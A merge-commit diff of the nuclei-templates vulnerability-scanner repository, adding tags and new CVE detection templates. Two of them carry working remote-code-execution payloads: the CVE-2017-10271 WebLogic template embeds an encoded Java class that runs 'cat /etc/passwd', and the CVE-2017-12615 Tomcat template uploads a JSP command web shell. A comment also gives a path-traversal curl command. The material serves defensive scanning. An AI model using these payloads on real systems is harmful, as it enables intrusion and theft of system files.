Merge pull request #9 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-02-13 12:36:00 +05:30 committed by GitHub
commit 810054af71
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
309 changed files with 1214 additions and 279 deletions

View File

@ -12,10 +12,6 @@
# More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion
.pre-commit-config.yaml
cves/2013/CVE-2013-2251.yaml
cves/2017/CVE-2017-7529.yaml
cves/2020/CVE-2020-13379.yaml
cves/2020/CVE-2020-16139.yaml
# Fuzzing is excluded to avoid running bruteforce on every server as default.
fuzzing/

View File

@ -28,13 +28,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts |
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 165 | default-logins | 8 |
| cves | 176 | default-logins | 8 |
| dns | 6 | exposed-panels | 74 |
| exposed-tokens | 9 | exposures | 41 |
| exposed-tokens | 9 | exposures | 44 |
| fuzzing | 4 | helpers | 2 |
| miscellaneous | 12 | misconfiguration | 39 |
| takeovers | 1 | technologies | 46 |
| vulnerabilities | 75 | workflows | 17 |
| miscellaneous | 12 | misconfiguration | 40 |
| takeovers | 1 | technologies | 45 |
| vulnerabilities | 81 | workflows | 18 |
**Tree structure of nuclei templates:**
@ -57,7 +57,9 @@ An overview of the nuclei template directory including number of templates assoc
│   │   └── CVE-2014-6271.yaml
│   ├── 2017
│   │   ├── CVE-2017-10075.yaml
│   │   ├── CVE-2017-10271.yaml
│   │   ├── CVE-2017-11444.yaml
│   │   ├── CVE-2017-12615.yaml
│   │   ├── CVE-2017-12637.yaml
│   │   ├── CVE-2017-14537.yaml
│   │   ├── CVE-2017-14849.yaml
@ -86,6 +88,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2018-19439.yaml
│   │   ├── CVE-2018-20824.yaml
│   │   ├── CVE-2018-2791.yaml
│   │   ├── CVE-2018-3167.yaml
│   │   ├── CVE-2018-3714.yaml
│   │   ├── CVE-2018-3760.yaml
│   │   ├── CVE-2018-5230.yaml
@ -116,7 +119,6 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-16278.yaml
│   │   ├── CVE-2019-1653.yaml
│   │   ├── CVE-2019-16662.yaml
│   │   ├── CVE-2019-16759-1.yaml
│   │   ├── CVE-2019-16759.yaml
│   │   ├── CVE-2019-16920.yaml
│   │   ├── CVE-2019-17382.yaml
@ -133,6 +135,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-3396.yaml
│   │   ├── CVE-2019-3402.yaml
│   │   ├── CVE-2019-3799.yaml
│   │   ├── CVE-2019-5127.yaml
│   │   ├── CVE-2019-5418.yaml
│   │   ├── CVE-2019-6112.yaml
│   │   ├── CVE-2019-6340.yaml
@ -145,6 +148,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-8451.yaml
│   │   ├── CVE-2019-8903.yaml
│   │   ├── CVE-2019-8982.yaml
│   │   ├── CVE-2019-9041.yaml
│   │   ├── CVE-2019-9670.yaml
│   │   ├── CVE-2019-9733.yaml
│   │   ├── CVE-2019-9955.yaml
@ -163,10 +167,12 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-13942.yaml
│   │   ├── CVE-2020-14179.yaml
│   │   ├── CVE-2020-14181.yaml
│   │   ├── CVE-2020-14815.yaml
│   │   ├── CVE-2020-14864.yaml
│   │   ├── CVE-2020-14882.yaml
│   │   ├── CVE-2020-15129.yaml
│   │   ├── CVE-2020-15505.yaml
│   │   ├── CVE-2020-15568.yaml
│   │   ├── CVE-2020-15920.yaml
│   │   ├── CVE-2020-16846.yaml
│   │   ├── CVE-2020-16952.yaml
@ -182,6 +188,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-24223.yaml
│   │   ├── CVE-2020-24312.yaml
│   │   ├── CVE-2020-24579.yaml
│   │   ├── CVE-2020-25213.yaml
│   │   ├── CVE-2020-2551.yaml
│   │   ├── CVE-2020-25540.yaml
│   │   ├── CVE-2020-26214.yaml
@ -218,8 +225,12 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-9496.yaml
│   │   └── CVE-2020-9757.yaml
│   └── 2021
│   ├── CVE-2021-22122.yaml
│   ├── CVE-2021-22873.yaml
│   ├── CVE-2021-25646.yaml
│   ├── CVE-2021-26710.yaml
│   ├── CVE-2021-26722.yaml
│   ├── CVE-2021-26723.yaml
│   └── CVE-2021-3019.yaml
├── default-logins
│   ├── activemq
@ -349,6 +360,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── amazon-docker-config-disclosure.yaml
│   │   ├── ansible-config-disclosure.yaml
│   │   ├── composer-config.yaml
│   │   ├── docker-compose-config.yml
│   │   ├── exposed-svn.yaml
│   │   ├── git-config-nginxoffbyslash.yaml
│   │   ├── git-config.yaml
@ -373,6 +385,8 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── ds_store.yaml
│   │   ├── exposed-alps-spring.yaml
│   │   ├── filezilla.yaml
│   │   ├── golang-metrics.yaml
│   │   ├── keycloak-json.yaml
│   │   ├── lazy-file.yaml
│   │   ├── server-private-keys.yaml
│   │   └── xprober-service.yaml
@ -429,12 +443,13 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── larvel-debug.yaml
│   ├── linkerd-ssrf-detect.yaml
│   ├── manage-engine-ad-search.yaml
│   ├── misconfigured-docker.yaml
│   ├── nginx-status.yaml
│   ├── php-errors.yaml
│   ├── php-fpm-status.yaml
│   ├── put-method-enabled.yaml
│   ├── rack-mini-profiler.yaml
│   ├── salesforce-aura-misconfig.yaml
│   ├── salesforce-aura.yaml
│   ├── server-status-localhost.yaml
│   ├── shell-history.yaml
│   ├── sidekiq-dashboard.yaml
@ -460,7 +475,6 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── bigip-config-utility-detect.yaml
│   ├── cacti-detect.yaml
│   ├── clockwork-php-page.yaml
│   ├── couchdb-detect.yaml
│   ├── detect-springboot-actuator.yaml
│   ├── favicon-detection.yaml
│   ├── firebase-detect.yaml
@ -516,9 +530,12 @@ An overview of the nuclei template directory including number of templates assoc
│   │   └── unauthenticated-jenkin-dashboard.yaml
│   ├── jira
│   │   ├── jira-service-desk-signup.yaml
│   │   ├── jira-unauthenticated-adminprojects.yaml
│   │   ├── jira-unauthenticated-dashboards.yaml
│   │   ├── jira-unauthenticated-popular-filters.yaml
│   │   ├── jira-unauthenticated-projectcategories.yaml
│   │   ├── jira-unauthenticated-projects.yaml
│   │   ├── jira-unauthenticated-resolutions.yaml
│   │   └── jira-unauthenticated-user-picker.yaml
│   ├── moodle
│   │   ├── moodle-filter-jmol-lfi.yaml
@ -528,6 +545,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── other
│   │   ├── CNVD-2020-62422.yaml
│   │   ├── acme-xss.yaml
│   │   ├── apache-flink-unauth-rce.yaml
│   │   ├── aspnuke-openredirect.yaml
│   │   ├── bullwark-momentum-lfi.yaml
│   │   ├── cached-aem-pages.yaml
@ -562,6 +580,9 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── springboot
│   │   ├── springboot-actuators-jolokia-xxe.yaml
│   │   └── springboot-h2-db-rce.yaml
│   ├── thinkcmf
│   │   ├── thinkcmf-lfi.yaml
│   │   └── thinkcmf-rce.yaml
│   ├── thinkphp
│   │   ├── thinkphp-2-rce.yaml
│   │   ├── thinkphp-5022-rce.yaml
@ -605,12 +626,13 @@ An overview of the nuclei template directory including number of templates assoc
├── springboot-workflow.yaml
├── thinkphp-workflow.yaml
├── vbulletin-workflow.yaml
├── weblogic-workflow.yaml
└── wordpress-workflow.yaml
```
</details>
**55 directories, 508 files**.
**56 directories, 529 files**.
📖 Documentation
-----

View File

@ -3,6 +3,7 @@ info:
name: CVE-2005-2428
author: CasperGN
severity: medium
tags: cve,cve2005
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: AppServ Open Project 2.5.10 and earlier XSS
author: unstabl3
severity: medium
tags: cve,cve2008,xss
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: exploitation & @dwisiswant0
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
tags: cve,cve2013,rce
requests:
- payloads:

View File

@ -5,6 +5,7 @@ info:
author: pentest_swissky
severity: high
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
tags: cve,cve2014,rce
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: madrobot
severity: medium
description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
tags: cve,cve2017,xss,oracle
requests:
- method: GET

View File

@ -0,0 +1,67 @@
id: CVE-2017-10271
info:
name: CVE-2017-10271
author: dr_set
severity: high
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
tags: cve,cve2017,rce,oracle,weblogic
# Source:- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
requests:
- raw:
- |
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 5178
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say" id="proc">
<string>cat /etc/passwd</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object idref="proc"></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
matchers:
- type: regex
regex:
- 'root:[x*]:0:0'
part: body

View File

@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: high
description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.
tags: cve,cve2017,sqli,subrion
# Source:
# - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q

View File

@ -0,0 +1,50 @@
id: CVE-2017-12615
info:
name: Apache Tomcat RCE
author: pikpikcu
severity: critical
tags: cve,cve2017,apache,rce
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
description: |
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
requests:
- method: PUT
path:
- "{{BaseURL}}/poc.jsp/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
- method: GET
path:
- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200

View File

@ -5,6 +5,7 @@ info:
author: apt-mirror
severity: high
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
tags: cve,cve2017,sap,traversal
# References:
# - [1] https://www.cvedetails.com/cve/CVE-2017-12637/

View File

@ -4,6 +4,7 @@ info:
name: trixbox 2.8.0 - directory-traversal
author: pikpikcu
severity: medium
tags: cve,cve2017,trixbox,traversal
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/

View File

@ -5,6 +5,7 @@ info:
author: Random-Robbie
severity: high
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
tags: cve,cve2017,nodejs,traversal
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: "Struts2 RCE "
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce
# This template supports the detection part only.
# Do not test any website without permission

View File

@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: medium
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
tags: cve,cve2017,magmi,xss
# Issues:-https://github.com/dweeves/magmi-git/issues/522
# Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip

View File

@ -5,7 +5,7 @@ info:
author: bp0lr & dwisiswant0
severity: high
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
tags: cve,cve2017,mantisbt
# THIS TEMPLATE IS ONLY FOR DETECTING
# To carry out further attacks, please see reference[2] below.

View File

@ -5,6 +5,7 @@ info:
author: pd-team
severity: high
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
tags: cve,cve2017,atlassian,jira,ssrf
requests:
- method: GET

View File

@ -5,6 +5,8 @@ info:
author: Random-Robbie
severity: high
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
tags: cve,cve2017,php,phpunit,rce
# Reference to exploit
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
# https://github.com/RandomRobbieBF/phpunit-brute

View File

@ -4,6 +4,8 @@ info:
name: Cisco ASA path traversal vulnerability
author: organiccrap
severity: medium
tags: cve,cve2018,cisco,traversal
# https://github.com/yassineaboukir/CVE-2018-0296
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
# if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number

View File

@ -5,6 +5,7 @@ info:
author: mavericknerd @0h1in9e
severity: high
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
tags: cve,cve2018,jolokia,xss
requests:
- method: GET

View File

@ -4,8 +4,8 @@ info:
name: Splunk Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
tags: cve,cve2018,splunk
requests:
- method: GET

View File

@ -4,8 +4,8 @@ info:
name: Apache Tomcat JK Status Manager Access
author: Harsh Bothra
severity: medium
# Source:- https://github.com/immunIT/CVE-2018-11759
reference: https://github.com/immunIT/CVE-2018-11759
tags: cve,cve2018,apache
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: RSA Authentication Manager XSS
author: madrobot
severity: medium
tags: cve,cve2018,xss,flash
requests:
- method: GET

View File

@ -4,7 +4,8 @@ info:
name: Spring MVC Directory Traversal Vulnerability
author: hetroublemakr
severity: high
# reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
tags: cve,cve2018,spring,traversal
requests:
- method: GET

View File

@ -11,6 +11,8 @@ info:
An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Datas projection-based request payload binding hat can lead to a remote code execution attack.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
tags: cve,cve2018,vmware,rce
requests:
- payloads:

View File

@ -4,6 +4,7 @@ info:
name: FortiOS - Credentials Disclosure
author: organiccrap
severity: high
tags: cve,cve2018,fortios
requests:
- method: GET

View File

@ -7,6 +7,7 @@ info:
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
type: XSS
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
tags: cve,cve2018,fortios,xss
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Django Open Redirect
author: pikpikcu
severity: low
tags: cve,cve2018,django,redirect
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Responsive filemanager 9.13.1 - SSRF/LFI
author: madrobot
severity: high
tags: cve,cve2018,ssrf,lfi
requests:
- method: POST

View File

@ -4,7 +4,9 @@ info:
name: Nuxeo Authentication Bypass Remote Code Execution
author: madrobot
severity: high
description: Nuxeo Authentication Bypass Remote Code Execution &lt; 103 using a SSTI
description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
tags: cve,cve2018,nuxeo,ssti,rce
requests:
- method: GET
path:

View File

@ -4,6 +4,7 @@ info:
name: fuelCMS 1.4.1 - Remote Code Execution
author: pikpikcu
severity: critical
tags: cve,cve2018,fuelcms,rce
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1

View File

@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: critical
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
tags: cve,cve2018,comodo,rce
# References:
# - https://www.exploit-db.com/exploits/48825

View File

@ -5,6 +5,7 @@ info:
author: nadino
severity: medium
description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
tags: cve,cve2018,wordpress,xss
requests:
- method: POST

View File

@ -4,8 +4,8 @@ info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author: pikpikcu
severity: medium
# Refrence:-https://www.cvedetails.com/cve/CVE-2018-19386/
refrence: https://www.cvedetails.com/cve/CVE-2018-19386/
tags: cve,cve2018,solarwinds,xss
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: madrobot & dwisiswant0
severity: high
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
tags: cve,cve2018,oracle,xss
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: madrobot & dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
tags: cve,cve2018,atlassian,jira,xss
requests:
- method: GET

View File

@ -5,6 +5,8 @@ info:
author: madrobot
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
tags: cve,cve2018,oracle,xss
requests:
- method: GET
path:

View File

@ -0,0 +1,25 @@
id: CVE-2018-3167
info:
name: Unauthenticated Blind SSRF in Oracle EBS
author: geeknik
severity: low
description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145
tags: cve,cve2018,oracle,ebs,ssrf
requests:
- method: POST
path:
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://localhost:80">
matchers-condition: and
matchers:
- type: word
words:
- 'Unexpected text in DTD'
part: body
- type: status
status:
- 200

View File

@ -3,6 +3,8 @@ info:
name: node-srv Path Traversal
author: madrobot
severity: high
reference: https://hackerone.com/reports/309124
tags: cve,cve2018,nodejs,traversal
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Rails CVE-2018-3760
author: 0xrudra
severity: high
tags: cve,cve2018,rails,traversal
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Atlassian Confluence Status-List XSS
author: madrobot
severity: medium
tags: cve,cve2018,atlassian,confluence,xss
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: AnchorCMS Error Log Exposure
author: pd-team
severity: medium
tags: cve,cve2018,anchorcms,logs
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: uWSGI PHP Plugin Directory Traversal
author: madrobot
severity: high
tags: cve,cve2018,uwsgi,php,traversal
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Apache ActiveMQ XSS
author: pd-team
severity: medium
tags: cve,cve2018,apache,activemq,xss
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: high
description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
tags: cve,cve2018,apache,ofbiz,xxe
requests:
- raw:

View File

@ -4,6 +4,7 @@ info:
name: Apache mod_proxy HTML Injection / Partial XSS
author: pd-team
severity: medium
tags: cve,cve2019,apache,htmli
requests:
- method: GET

View File

@ -4,8 +4,9 @@ info:
name: Timesheet 1.5.3 - Cross Site Scripting
author: pikpikcu
severity: high
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
tags: cve,cve2019,timesheet,xss
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
# Google-Dork: inurl:"/timesheet/login.php"
# Demo: http://www.mdh-tz.info/

View File

@ -4,6 +4,7 @@ info:
name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
author: madrobot
severity: medium
tags: cve,cve2019,jenkins,xss
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: exposed_pprof
author: 0xceeb
severity: medium
tags: cve,cve2019,debug
# https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0
# http://mmcloughlin.com/posts/your-pprof-is-showing

View File

@ -4,7 +4,8 @@ info:
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
author: organiccrap
severity: high
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
tags: cve,cve2019,pulsesecure,traversal
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
author: dwisiswant0
severity: critical
tags: cve,cve2019,atlassian,rce
# Atlassian Crowd and Crowd Data Center
# had the pdkinstall development plugin incorrectly enabled in release builds.

View File

@ -6,9 +6,7 @@ info:
author: ree4pwn
severity: critical
reference: https://github.com/jas502n/CVE-2019-11581
product: Jira
# This is detection template only, use the referenced link for the exploitation.
tags: cve,cve2019,atlassian,jira,ssti,rce
requests:
- method: GET

View File

@ -15,6 +15,7 @@ info:
References:
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
- https://wpscan.com/vulnerability/9254
tags: cve,cve2019,wordpress,wp-plugin,xss
requests:
- raw:

View File

@ -4,6 +4,7 @@ info:
name: Deltek Maconomy 2.2.5 LFIl
author: madrobot
severity: high
tags: cve,cve2019,lfi
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: WebPort 1.19.1 - Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
tags: cve,cve2019,xss
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/

View File

@ -4,6 +4,7 @@ info:
name: IIceWarp <=10.4.4 - Local File Inclusion
author: pikpikcu
severity: high
tags: cve,cve2019,lfi
# reference: https://nvd.nist.gov/vuln/detail/CVE-2019-12593
# Google Dork:-Powered By IceWarp 10.4.4

View File

@ -12,6 +12,7 @@ info:
references: |
- https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
- https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
tags: cve,cve2019,rce
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Alfresco Share Open Redirect
author: pd-team
severity: low
tags: cve,cve2019,redirect
requests:
- method: POST

View File

@ -4,6 +4,7 @@ info:
name: Odoo 12.0 - Local File Inclusion
author: madrobot
severity: high
tags: cve,cve2019,lfi
requests:
- method: GET

View File

@ -4,9 +4,8 @@ info:
name: Open-Scool 3.0/Community Edition 2.3 - Cross Site Scripting
author: pikpikcu
severity: medium
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-14696
# Vendor Homepage: [https://open-school.org/]
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-14696
tags: cve,cve2019,xss
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: low
tags: cve,cve2019,xss
requests:
- method: GET

View File

@ -3,21 +3,23 @@ info:
author: bing0o
